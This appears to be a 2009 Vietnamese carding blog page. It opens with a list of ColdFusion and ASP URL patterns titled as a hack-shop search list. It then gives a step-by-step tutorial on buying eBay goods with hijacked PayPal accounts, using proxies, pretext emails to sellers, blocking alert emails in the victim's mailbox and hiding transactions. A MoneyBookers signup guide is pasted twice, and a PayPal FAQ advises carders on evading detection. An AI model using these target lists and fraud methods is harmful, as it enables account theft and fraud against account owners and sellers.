.cfm?detail=1
.cfm?subcategory=1
.cfm?destinationid=1
product.cfm?ProductID=1
cfm?categoryid=1
.cfm?TodoID=1
.cfm?cabinetID=1
trips.cfm?destinationid=1
KeyWorld hack shop CFM Part ( 3 )
.cfm?ArticleID=
.asp?mid=
.cfm?CFID=
.cfm?idzona=
.cfm?ZielErr=
index.cfm?smithgrind=
article.cfm?article=
book.cfm?&pid=
detail.cfm?rif=
/invoke.cfm?objectid=
/link.cfm?findcateg=
index.cfm?pagePkey=
/lista-aziende.cfm?idcat=
/cool.cfm?Selection=
Detail.cfm?said=
/corporate.cfm?IDNoteStampaFR=
/book.cfm?tab=
/viewcolumn.cfm?colid=
.asp/p=
.asp/f=
.cfm?indirizzo=
.cfm?provincia=
.asp?IdArt=
.cfm?afsrc=
.cfm?go=
.cfm?PID=
.asp?drug=
.asp?prid=
.cfm?an=
.cfm?nr=
.cfm?id2=
.cfm?rpid=1
.cfm?vid=1
.asp?st=
.asp?NID=
.asp?stateID=
.asp?DoAction=
.cfm?returnto=
.cfm?event=
.cfm?obj=
.cfm?pt=
.cfm?MerchantID=
.cfm?what=
lista-aziende.cfm?idcat=
/detail.cfm?IdNotizia=
.cfm?country=
index.cfm?id_rst=
detail.cfm?IdNotizia=
/index.cfm?release=
/infopop.cfm?classID=
leggi.cfm?art=
scheda.cfm?expID=
shop.cfm?artnr=
index.cfm?documentID=
/news_detail.cfm?newsID=
index.cfm?fuseaction=
/print-narrative.cfm?destID=
/index.cfm?sid=
/glossario.cfm?IDGlossario=
dyncat.cfm?catid=
theproducts.cfm?Owner=
theproducts.cfm?subcat=
imgindex.cfm?cat=
.cfm?Ne=1
.cfm?N=1
.cfm?ModelID=1
.cfm?viewall=1
.asp?Ntt=1`s
.cfm?Manufacturer=1
.cfm?vid=1
.cfm?fuseaction=1
.cfm?sub_site_id=1
Thứ Năm, 15 tháng 1, 2009
Tut Ship Ebay
Chuẩn bị:
- 1 SSH không dính BL Paypal
- 1 ACC Paypal có pass mail
- 1 acc ebay tự tạo hoặc check mail chủ paypal kiếm cũng đc (tớ toàn tự tạo Ebay ^^!), Và 1 con sock 5 không dính BL paypal nữa (Cách kiểm tra xem sock ko dính BL tớ sẽ chỉ ở dưới ^^!)
Bắt đầu nha:
Bước 1: Check Palpal (Để mà đâm em nó chứ ). check được PP + Mail pass thì thoát ra luôn. sau khi check khoảng 2-3 ngày thì mới vào pay ^^!
- Sock: dùng 1 con SSH không dính BL paypal. 1 sock ko dính bl của paypal thường như sau:
- Chạy sock, sau đó vào trang http://rapidshare.com. Click vào nút buy 1 acc mới ở ebay khi hiện ra trang thanh toán = paypal. các bạn chọn thanh toán = Credit Card. Nếu nó bắt nhập pass thì là sock…. cùi mía.
còn nếu nó không bắt nhập pass thì con sock này ngon
Tất nhiên, cách check sock này cũng là tương đối thôi ^^! tớ chưa có khẳng định cách check này là chuẩn xác nhất. Nhớ là: check được PP + Mail pass thì thoát ra, để nguyên đó. sau khi check khoảng 2-3 ngày thì mới vào pay ^^!
Khi check mail nhớ kiểm tra xem nó có hay giao dịch trên mạng không, log vào PP xem những giao dịch gần đây của nó là ngày bao nhiêu, có hay mua trên eBay không. (cái này tớ thường chọn con PP ít có giao dịch trên mạng, thường là Premier. và cũng… ít mua hàng trên eBay nữa.)
Không biết có phải do ngẫu nhiên không nhưng mà khi tớ dùng con PP có mua bán trên ebay thường tỷ lệ Led rất cao ^^!
Nếu muốn pay = con SSH này thì các bạn không được dùng nó làm bất cứ việc gì khác trong vòng 2-3 ngày cả trước và sau khi pay
Bước 2: Search Item.
VD chúng ta muốn ship 1 con Cellphone, Search trên ebay thì nhiều seller lắm nhưng cái quan trọng là nó có chịu ship về VN hay ko. Có những thằng đầu tiên không chịu ship nhưng sau khi mình contact nó lại ok
Trước hết các bạn vào Ebay (Nhớ log bằng con SSH nha ^^!), chọn Advanced Search (Xem hình ở dưới
Để giảm thời gian tìm món hàng cần mua ở đây tớ làm như sau:
VD ở đây tớ muốn Buy 1 con Iphone 8GB, Ở mục Advanced Search các bạn điền như sau:
Enter keyword or item number: Iphone 8GB
Items Priced: Min: US $300 (cái này điền vào để chọn giá thấp nhất là 300$)
Items available to : Viet Nam (Thường khi để ntn thì Item đó đã được seller accept ship wordwide)
Buying Options: Buy it now ( List những Item search ra sẽ có thể mua được luôn )
Bước 3: Tìm Seller Gà.
-Click vào item mình chọn. Để ý số Feedback của Seller (Càng nhỏ càng tốt) Seller nhiều FB cũng no ploblem. chỉ cần nó chịu ship unconfirm add
Tìm dòng “Confirm”
-Xem ở dưới chỗ nó trình bày Item Nếu nhìn đơn giản như thế này (ko nhắc gì đến việc paypal very hay là bắt confirm add cả):
-Còn như thế này thì bỏ qua nhé (tìm thằng khác. Ebay thiếu cha gì ) - Nó bắt confirm address
Bước 4: Contact Seller.
Trước tiên. khi nhìn tìm thấy 1 seller như thế bạn đừng có đâm vội. tội nghiệp nó . Contact nó trước đã. cách contact thì có nhiều cách bạn có thể xem ở dưới chỗ trình bày item. nếu nó điền email ở dưới thì hãy mail cho nó. còn không thì nhấn vào Ask seller a question:
hello seller. can you help me….
i want buy you item as the gift my friend’s birthday.
But in this week, i’m not in office
Now i’m very busy in EURO
She has some biz in Vietnam
if you can ship to her. i’ll buy.
thanks you.
Tớ thường contact như thế này và contact 1 lúc cho nhiều thằng. anh em nào giỏi tiếng Anh thì tự soạn cho mình 1 cách contact khác nhau nhé ^^!
Nếu trót lọt nó sẽ mail về cho mình 1 mail dạng như là:
Còn nếu nó ko chịu ship thì mail sẽ là:
Bước 5: Đâm.
khi mà seller đã ok ship về VN roài thì các bạn log vào eBay, tìm đến links của Item đó và dùng con sock đã check băm luôn (lúc này có thể dùng Sock 5 hoặc SSH. Miễn là không dính BL của PP là ok - tớ thường dùng nguyên con SSH. và nhớ là con sock đó phải không sử dụng trước khi pay 3 ngày và sau khi pay 3 ngày)
Khi Băm xong nhớ vào Mail của chủ thẻ, Block hết các mail có domain kiểu như: paypal.com và ebay.com, ebay.cn, ebay.co.uk, ………….. nói chung là block tất cả các email liên quan đến eBay và paypal.
sau khi thanh toán bạn hãy log vào Paypal. xóa hết tất cả các giao dịch gần đây đi (thực ra là ẩn đi thôi . Giao dịch gần nhất nó thường hiện ở dưới. rồi sau đó thoát hẳn ra ngoài.không log vào con paypal và ebay đó nữa. chờ track gửi về Mail của ebay thôi.
Khi thanh toán bạn hãy cho thằng seller thêm vài chục đô nữa. bảo nó ship nhanh cho mình thế là ok thôi ^^! sau khi ship, tớ thường send cho nó 1 mail như thế này:
Hi
i have just bought your item as the gift for my friend’s birthday and i want to know when you can ship it to him
my friend’s birthday is on july 22, just 5 days left , currently, he has some biz in Vietnam
Because i’m busy in EURO in this week
Can you ship it in today?
I want him delivered the item on july 22.
If can … thank you very much.
Plz ship it:
add của tớ ^^!
Nhớ thay đổi mấy mail tớ contact seller đi nhé ^^! để im mà dùng…. tai họa đấy vì trình English của tớ… bựa lắm
Ship eBay cũng có 1 số yếu tố hên xui: Nếu sock lởm ====> PP Limit ====> Led, chủ thẻ phát hiện ====> Đòi refund money =====> PP Limit ====> led……….. rồi vô số lý do nữa
Nhưng nếu các bạn làm theo lời tớ thì sẽ giảm rủi do led đi rất nhiều đấy.Thường là sau khi pay khoảng 24-48h là có tracking lúc ấy nhớ cho tớ ăn mừng nhé ha ha
P/s: đây chỉ là cách làm giảm khả năng Led ở ebay thôi. Chủ yếu là may mắn Anh em ai có kinh nghiệm đưa lên để tất cả cùng thảo luận nhé.Cảm ơn đã đọc bài của mình. ^^!
Tớ có 1 cách Fake add. tức là khi thằng chủ PP nó log vào xem tranfer statement (các giao dịch gần đây) sẽ thấy Shipping add là của nó khi đó đôi khi nó ko đòi refund tiền đâu, mà nó cứ để im (trường hợp chủ PP hay mua bán trên ebay thì tớ mới dùng cách này.)
Thủ thuật ở câu tớ post ở TUT trên ấy
sorry but I got some mistakes with the shiping address
i gave u my adress instead of my friend’s
U know, i wanna give her this cell phone as a gift. Him adress is xx
Đọc qua các bạn có hiểu gì ko?
tức là khi thằng seller nó accept ship to VN rồi, sau khi buy (điền add của chủ PP) mình sẽ mail cho nó 1 thư với nội dung như trên. Đại khái là:
Tôi vừa mua 1 item của bạn. số item là: xxxxxxxx
Nhưng tôi lại điền nhầm Shipping add là của tôi.
Tôi muốn bạn ship về địa chỉ của bạn tôi ở Việt Nam.
Ngày xx tháng xx là sinh nhật của anh ấy. chỉ còn xxx ngày nữa (ít ngày thôi) là đến SN của anh ấy rồi
Tôi muốn bạn ship vào địa chỉ của anh ấy ở Việt Nam, không phải địa chỉ của tôi.
Địa chỉ của anh ấy là: xxxxx (ghi địa chỉ của mình vào )
Thủ thuật ở đây là gì: Làm cho add của payment ở trong Paypal trở thành confirmed add :-” (add của chủ thẻ).
Trong khi đó địa chỉ nhận hàng lại là địa chỉ của mình và nó cũng giảm thiểu tối đa việc mình bị kiện (rủi ro). Và giảm thiểu tối đa việc Paypal Limitted add shipping là add confirmed by Paypal cơ mà :-”
Đăng Kí MoneyBookers
MoneyBookers
MoneyBookers là dịch vụ thanh toán tài chính trực tuyến, đang ngày càng phát triển rộng rãi không kém gì e-Gold mà có khi còn phổ biến hơn cả e-Gold.
Nhờ MoneyBookers bạn có thể:
chuyển tiền cho người khác thông qua địa chỉ e-mail
thanh toán tiền khi mua hàng trực tuyến (thanh toán tài chính online)
tiếp nhận tiền qua địa chỉ e-mail
chuyển tiền từ tài khoản của bạn ở trong nước vào tài khoản MoneyBookers của bạn
chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở trong nước.
Mở tài khoản ở MoneyBookers.com?
Truy cập vào http://www.moneybookers.com
Mở ra cho bạn trang Moneybookers.com - bạn click vào “Register” ở góc trên bên trái
Mở ra cho bạn trang để điền thông tin đăng ký, những ô có dấu sao đỏ là bắt buộc phải điền, ví dụ: “Email*”
Đánh dấu vào ô bên cạnh hàng chữ: I signify my full acceptance of moneybookers’ General Terms & Conditions of Membership and Privacy Policy.
Chấp nhận các điều khoản của nội quy.
Click vào nút “Register”
QUAN TRỌNG:
Chỉ trong khoảnh khắc là MoneyBookers sẽ gửi cho bạn mã số vào địa chỉ e-mail, bạn phải điền mã số đó vào trang moneybookers để xác nhận địa chỉ e-mail.
Sau khi sác nhận địa chỉ e-mail thành công là bạn đã có tài khoản ỏ MoneyBookers. Địa chỉ e-mail của bạn cũng chính là tên truy cập (login) của bạn.
Để sử dụng được các tính năng ưu việt của MoneyBookers thì bạn có thể gửi tiền vào tài khoản MoneyBookers nhờ đó bạn có thể thanh toán tiền khi mua hàng trực tuyến, hoặc chuyển tiền cho người khác.
Khi bạn đã có tài khoản thì bạn có thể truy cập vào MoneyBookers.com
Để truy cập vào tài khoản ở Moneybookers.com:
1. Click vào “Login” ở phía trên, bên trái
2. Sau đó bạn điền địa chỉ e-mail, mật khẩu và điền mã số bảo mật hiện ra ở ô bên cạnh.
Làm thế nào để gửi tiền vào tài khoản ở MoneyBookers.com?
Chú ý: Hiện nay tôi sống ở Ba lan chứ không phải ở Việt nam nên những chỉ dẫn sau đây được dựa theo kinh nghiệm sử dụng tài khoản MoneyBookers của tôi ở Balan. Thực tế ở Việt nam như thế nào thì tôi không rõ. Nếu bạn nào áp dụng được những chỉ dẫn sau đây vào hoàn cảnh ở Việt nam thì cho tôi biết để phổ biến rộng rãi cho mọi người. Khi đăng ký tài khoản ở MoneyBookers có Việt nam trong phần lựa chọn quốc gia. Nếu hình thức chuyển tiền từ tài khoản MoneyBookers vào tài khoản ở Việt nam áp dụng được thì là điều đáng mừng. Vì khi chuyển khoản MoneyBookers chỉ thu có 1,80 EURO lệ phí, trong khi chuyển tiền từ e-Gold về Việt nam thông qua WESTERN UNION bị mất những 20$ lệ phí!
Sau khi truy cập (Login):
1. Bạn Click vào: “My Account”
2. Sau đó click vào “upload fund”
3. Đánh dấu vào mục: “Bank Transfer”. Tại đây có 2 cách để bạn gửi tiền vào tài khoản Moneybookers. Chuyển khoản từ tài khoản của bạn ở trong nước (moneybookers không thu lệ phí khi tiếp nhận) hoặc chuyển tiền từ thẻ tín dụng (lệ phí 3%).
Trường hợp chuyển khoản
I. Đánh dấu mục “Bank Transfer”, bạn sẽ nhận được thông tin để bạn chuyển khoản đến đâu:
Account holder: Moneybookers Ltd.
Bank: BRE Bank SA
Account number: 20114010100000327056001001
Sort / Bank Code: 11401010
Account currency: PLN
Reference: Tại đây bạn điền số ID của bạn. Điều này rất quan trọng để MoneyBookers biết là sẽ chuyển tiền vào tài khoản cho ai. Để cho chắc ăn ở chỗ này tôi còn điền thêm địa chỉ e-mail của mình (login)
Chú ý: Bạn chỉ có thể chuyển khoản từ tài khoản của chính bạn ở trong nước, không chuyển được từ tài khoản của người khác. Đó là hình thức chống tình trạng “Rửa tiền” phạm pháp
Trường hợp chuyển tiền bằng thẻ tín dụng:
Trước khi chuyển tiền bằng thẻ tín dụng thì bạn phải qua thẩm tra để MoneyBookers xác nhận được bạn là người chủ sở hữu của thẻ tín dụng đó. Có 2 cách để MoneyBookers.com thẩm tra:
Cách 1: Bạn gửi scan (ảnh quét): tấm thẻ của bạn cả 2 mặt (thẻ phải có chữ ký của bạn), chứng minh thư, hộ chiếu, bằng lái xe vào địa chỉ e-mail: service@moneybookers.com. Ỏ đầu e-mail bạn cần phải điền địa chỉ e-mai của bạn mà bạn đã đăng ký tài khoản ở MoneyBookers.
Cách 2: Bạn có thể gửi fax bản sao các giấy tờ trên - Cần nhớ là ngay ở đầu bạn phải điền địa chỉ e-mail mà bạn đã đăng ký tài khoản ỏ MoneyBookers. Dưới đây là mốt số địa chỉ fax:
UK: 0709-2042001
USA: 509-271-5556
Germany: 030-6908-8436
Netherlands: 020-524-8418
International: +44-709-2042001 or +1-509-271-5556
Trong vòng 48 giờ từ khi nhận được các giấy tờ trên MoneyBookers sẽ thẩm tra và kích hoạt tích năng chuyển khoản từ thẻ tín dụng cho bạn.
Cách 3: Khi bạn kích hoạt tính năng chuyển khoản từ tài khoản, nếu ở tài khoản đó bạn có thẻ tín dụng thì bạn có thể kích họat luôn cả thẻ tín dụng.
Moneybookers cũng phục vụ các khách hàng sống tại Việt nam bình thường như những khác hàng ở các nước khác. Như vậy là nếu bạn có tài khoản Moneybookers thì bạn có thể:
1.Chuyển tiền từ tài khoản của bạn ở ngân hàng Việt nam vào tài khoản Moneybookers của bạn: Miễn phí
2.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở ngân hàng Việt nam: Phí chuyển tiền là 1,80 EURO cho một lần chuyển tiền.
3.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản MoneyBookers của người khác: Phí chuyển tiền là 1% số tiền chuyển
MoneyBookers là dịch vụ thanh toán tài chính trực tuyến, đang ngày càng phát triển rộng rãi không kém gì e-Gold mà có khi còn phổ biến hơn cả e-Gold.
Nhờ MoneyBookers bạn có thể:
chuyển tiền cho người khác thông qua địa chỉ e-mail
thanh toán tiền khi mua hàng trực tuyến (thanh toán tài chính online)
tiếp nhận tiền qua địa chỉ e-mail
chuyển tiền từ tài khoản của bạn ở trong nước vào tài khoản MoneyBookers của bạn
chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở trong nước.
Mở tài khoản ở MoneyBookers.com?
Truy cập vào http://www.moneybookers.com
Mở ra cho bạn trang Moneybookers.com - bạn click vào “Register” ở góc trên bên trái
Mở ra cho bạn trang để điền thông tin đăng ký, những ô có dấu sao đỏ là bắt buộc phải điền, ví dụ: “Email*”
Đánh dấu vào ô bên cạnh hàng chữ: I signify my full acceptance of moneybookers’ General Terms & Conditions of Membership and Privacy Policy.
Chấp nhận các điều khoản của nội quy.
Click vào nút “Register”
QUAN TRỌNG:
Chỉ trong khoảnh khắc là MoneyBookers sẽ gửi cho bạn mã số vào địa chỉ e-mail, bạn phải điền mã số đó vào trang moneybookers để xác nhận địa chỉ e-mail.
Sau khi sác nhận địa chỉ e-mail thành công là bạn đã có tài khoản ỏ MoneyBookers. Địa chỉ e-mail của bạn cũng chính là tên truy cập (login) của bạn.
Để sử dụng được các tính năng ưu việt của MoneyBookers thì bạn có thể gửi tiền vào tài khoản MoneyBookers nhờ đó bạn có thể thanh toán tiền khi mua hàng trực tuyến, hoặc chuyển tiền cho người khác.
Khi bạn đã có tài khoản thì bạn có thể truy cập vào MoneyBookers.com
Để truy cập vào tài khoản ở Moneybookers.com:
1. Click vào “Login” ở phía trên, bên trái
2. Sau đó bạn điền địa chỉ e-mail, mật khẩu và điền mã số bảo mật hiện ra ở ô bên cạnh.
Làm thế nào để gửi tiền vào tài khoản ở MoneyBookers.com?
Chú ý: Hiện nay tôi sống ở Ba lan chứ không phải ở Việt nam nên những chỉ dẫn sau đây được dựa theo kinh nghiệm sử dụng tài khoản MoneyBookers của tôi ở Balan. Thực tế ở Việt nam như thế nào thì tôi không rõ. Nếu bạn nào áp dụng được những chỉ dẫn sau đây vào hoàn cảnh ở Việt nam thì cho tôi biết để phổ biến rộng rãi cho mọi người. Khi đăng ký tài khoản ở MoneyBookers có Việt nam trong phần lựa chọn quốc gia. Nếu hình thức chuyển tiền từ tài khoản MoneyBookers vào tài khoản ở Việt nam áp dụng được thì là điều đáng mừng. Vì khi chuyển khoản MoneyBookers chỉ thu có 1,80 EURO lệ phí, trong khi chuyển tiền từ e-Gold về Việt nam thông qua WESTERN UNION bị mất những 20$ lệ phí!
Sau khi truy cập (Login):
1. Bạn Click vào: “My Account”
2. Sau đó click vào “upload fund”
3. Đánh dấu vào mục: “Bank Transfer”. Tại đây có 2 cách để bạn gửi tiền vào tài khoản Moneybookers. Chuyển khoản từ tài khoản của bạn ở trong nước (moneybookers không thu lệ phí khi tiếp nhận) hoặc chuyển tiền từ thẻ tín dụng (lệ phí 3%).
Trường hợp chuyển khoản
I. Đánh dấu mục “Bank Transfer”, bạn sẽ nhận được thông tin để bạn chuyển khoản đến đâu:
Account holder: Moneybookers Ltd.
Bank: BRE Bank SA
Account number: 20114010100000327056001001
Sort / Bank Code: 11401010
Account currency: PLN
Reference: Tại đây bạn điền số ID của bạn. Điều này rất quan trọng để MoneyBookers biết là sẽ chuyển tiền vào tài khoản cho ai. Để cho chắc ăn ở chỗ này tôi còn điền thêm địa chỉ e-mail của mình (login)
Chú ý: Bạn chỉ có thể chuyển khoản từ tài khoản của chính bạn ở trong nước, không chuyển được từ tài khoản của người khác. Đó là hình thức chống tình trạng “Rửa tiền” phạm pháp
Trường hợp chuyển tiền bằng thẻ tín dụng:
Trước khi chuyển tiền bằng thẻ tín dụng thì bạn phải qua thẩm tra để MoneyBookers xác nhận được bạn là người chủ sở hữu của thẻ tín dụng đó. Có 2 cách để MoneyBookers.com thẩm tra:
Cách 1: Bạn gửi scan (ảnh quét): tấm thẻ của bạn cả 2 mặt (thẻ phải có chữ ký của bạn), chứng minh thư, hộ chiếu, bằng lái xe vào địa chỉ e-mail: service@moneybookers.com. Ỏ đầu e-mail bạn cần phải điền địa chỉ e-mai của bạn mà bạn đã đăng ký tài khoản ở MoneyBookers.
Cách 2: Bạn có thể gửi fax bản sao các giấy tờ trên - Cần nhớ là ngay ở đầu bạn phải điền địa chỉ e-mail mà bạn đã đăng ký tài khoản ỏ MoneyBookers. Dưới đây là mốt số địa chỉ fax:
UK: 0709-2042001
USA: 509-271-5556
Germany: 030-6908-8436
Netherlands: 020-524-8418
International: +44-709-2042001 or +1-509-271-5556
Trong vòng 48 giờ từ khi nhận được các giấy tờ trên MoneyBookers sẽ thẩm tra và kích hoạt tích năng chuyển khoản từ thẻ tín dụng cho bạn.
Cách 3: Khi bạn kích hoạt tính năng chuyển khoản từ tài khoản, nếu ở tài khoản đó bạn có thẻ tín dụng thì bạn có thể kích họat luôn cả thẻ tín dụng.
Moneybookers cũng phục vụ các khách hàng sống tại Việt nam bình thường như những khác hàng ở các nước khác. Như vậy là nếu bạn có tài khoản Moneybookers thì bạn có thể:
1.Chuyển tiền từ tài khoản của bạn ở ngân hàng Việt nam vào tài khoản Moneybookers của bạn: Miễn phí
2.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản của bạn ở ngân hàng Việt nam: Phí chuyển tiền là 1,80 EURO cho một lần chuyển tiền.
3.Chuyển tiền từ tài khoản MoneyBookers của bạn vào tài khoản MoneyBookers của người khác: Phí chuyển tiền là 1% số tiền chuyển
Tìm hiểu về Paypal
1. Điều đầu tiên cần nhắc tới là PP phân ra 3 loại acc là : persional, premier và business .
Tuy nhiên premier và business tương tự nhau nên chúng ta chỉ bàn đến premier. Business nếu có càng tốt, mà không có cũng chẳng mất gì cả. Với premier đã đủ làm ăn rồi ^^Ok !!! Đối với tài khoản Persional, chúng ta chỉ được nhận tiền từ pp khác. Nghĩa là bạn muốn nhận tiền vào tài khoản thì phải được một tài khoản pp khác gửi tiền vào . Còn đối với tài khoản Premier, ngoài nhận tiền từ pp khác, các bạn có thể nhận tiền từ cc …. Nghĩa là người khác có thể thanh toán cho bạn bằng cc ( tạm gọi là fund tiền vào pp ) …
2. PP phân ra 2 tình trạng của tài khoản là unverify và verified
Unverify có 2 loại : 1 tài khoản vừa mới đăng kí và tài khoản đã đăng kí và add credit card vào tài khoản . Ở một số quốc gia, chỉ cần add credit card vào là đã verified rồi, tuy nhiên đối với các quốc gia lớn như USA thì add cc vẫn là chưa đủ. Đối với các tài khoản unverified thì việc nhận và chuyển tiền đi có một giới hạn nhất định về số lượng. Ngoài ra, tài khoản unveri ở dạng premier trở lên chỉ có thể nhận tiền thanh toán từ những cc chưa add vào paypal. Nghĩa là những cc đó chưa được add vào một tài khoản pp nào khác … Điều này có lẽ là hơi khó với dân carder, vì cc chưa add vào paypal khá ít, và chỉ thường ở những cc mới ra lò, mới open trở lại ….
Verified : là tài khoản đã được confirm bằng bank account hoặc add cc ( ở một vài quốc gia nhỏ ).. Đối với tài khoản verified ở dạng premier trở lên thì bạn được chấp nhận thanh toán tiền từ các cc bất kì, cho dù cc đó đã add vào paypal. Rất sướng phải không
3. Giữa Pp unver và pp ver hơn kém gì nhau không ?
Xin trả lời, chỉ hơn kém nhau về loại cc được fund tiền vào pp và uy tín … Đối với các trang ship như ebay … thì chỉ chấp nhận tài khoản pp verified. Vì đây là những tài khoản đã được chứng nhận là trong sạch.
4. Tại sao login bằng Pri Sock blacklist=0 vẫn bị limit ?
Có khả năng IP của bạn nằm trong blacklist của PP. Đối với PP, họ ko sử dụng danh sách blacklist ở bên ngoài mà sử dụng danh sách blacklist riêng. NGhĩa là cho dù sock bị blacklist ở bên ngoài mà ko nằm trong danh sách blacklist pp thì vẫn không sao.
NGoài ra, có những lúc PP của bạn limit với lí do : PP cần cung cấp thêm thông tin. Thực chất không phải PP tự dưng yêu cầu như vậy. Lí do đơn giản là location của IP bạn log vào PP khác với location đăng kí tài khoản PP. Chính vì vậy, nếu bạn không thể có IP trùng location với PP thì tốt nhất là hạn chế log vào PP account của bạn ^^
5. Làm sao để biết IP của mình có chơi được với PP hay không .
Bạn truy cập đến rapidshare.com …. đăng kí mua 1 tài khoản rapid … Sau khi được dẫn đến trang thanh toán của PP …. Nếu đến site nhập Credit Card mà button ở bên dưới là : Review Order and Contontinue hoặc có cái page đăng nhập, bên trái có dòng chữ đại loại như : click vào đây để tiếp tục sử dụng credit card để thanh toán… nghĩa là IP của bạn còn dùng tốt … các trường hợp còn lại nên thay IP khác ^^
6. Nếu PP của tôi là hack được thì có cần phải lưu ý gì không ?
Điều lưu ý trước tiên là IP log vào PP … để khỏi bị limit, cái này chắc các bạn cũng biết. Ngoài ra, trước khi quyết định xài PP, bạn phải kiểm tra xem thằng chủ PP có thường xuyên log vào PP hay không ? Nếu đang ship nữa chừng mà bị thằng chủ phát hiện thì bỏ mẹ ^^.
Để biết được, các bạn có thể xem history các lần send tiền của PP. Xem thử ngày thằng chủ PP dùng để nhận hoặc gửi tiền đi là lúc nào. Nếu là lúc gần đó thì cần phải cẩn thận hơn đừng để thẳng chủ PP biết là các bạn vừa xài PP của nó để mua hàng .
7. Làm sao để xóa history trong homepage của Acc paypal
Các bạn để ý thấy khi login vào acc pp, phía đưới page có 1 khung thông báo các giao dịch của pp trong vòng 1 tháng … Các bạn chọn vào những giao dịch liên quan đến mình ( muốn xóa ) và nhấn File Select là xongThực chất đây ko phải là xóa history và cũng pp cũng ko cho phép xóa history … Đây là chỉ xóa ko cho hiện lên trang chủ của account pp mà thôi. Người dùng vẫn vào phần history để xem …. Nhưng đa số người dùng pp ko hề vào đến phần đó ^^
8. Có Paypal có phải là tất cả ?
Xin thưa là không. Nhiều bạn lầm tưởng có pp có thể mua được acc, soft, host, ship, cashout rất sướng …. Thực chất không phải vậy.
PP là một tổ chức thanh toán rất uy tín và có nhiều quy định nghiêm ngặt về thanh toán trực tuyến. Bạn dùng PP chùa, tiền chùa, chỉ cần có lệnh đòi refund từ phía bank (chủ pp hoặc cc đòi) là ngay lập tức pp tạm khóa số tiền trong giao dịch và tài khoản của bạn lại để xác minh.Nếu bạn mua soft, ship … mà người bán đã giao soft hoặc ship hàng cho bạn (có bằng chứng) thì pp ko refund tiền nữa mà thằng bank ( của chủ pp hoặc cc) phải chịu thiệt . Còn nếu bạn mua các loại acc, host, domain …. những thứ này có thể cancel, del tài khoản nên chắc chắn sẽ không duy trì được lâu.
Chính vì vậy, đừng nghĩ có pp là mua được tất cả. Tuy nhiên, cái gì cũng có luật của nó … cho dù là acc, host …. nếu bạn dùng quá một khoảng thời gian nhất định mà chủ thẻ chưa đòi lại tiền thì sau đó có đòi cũng ko được nữa …. Cho dù là PP thì cũng không ngoại lệ ^^
Đăng ký:
Bài đăng (Atom)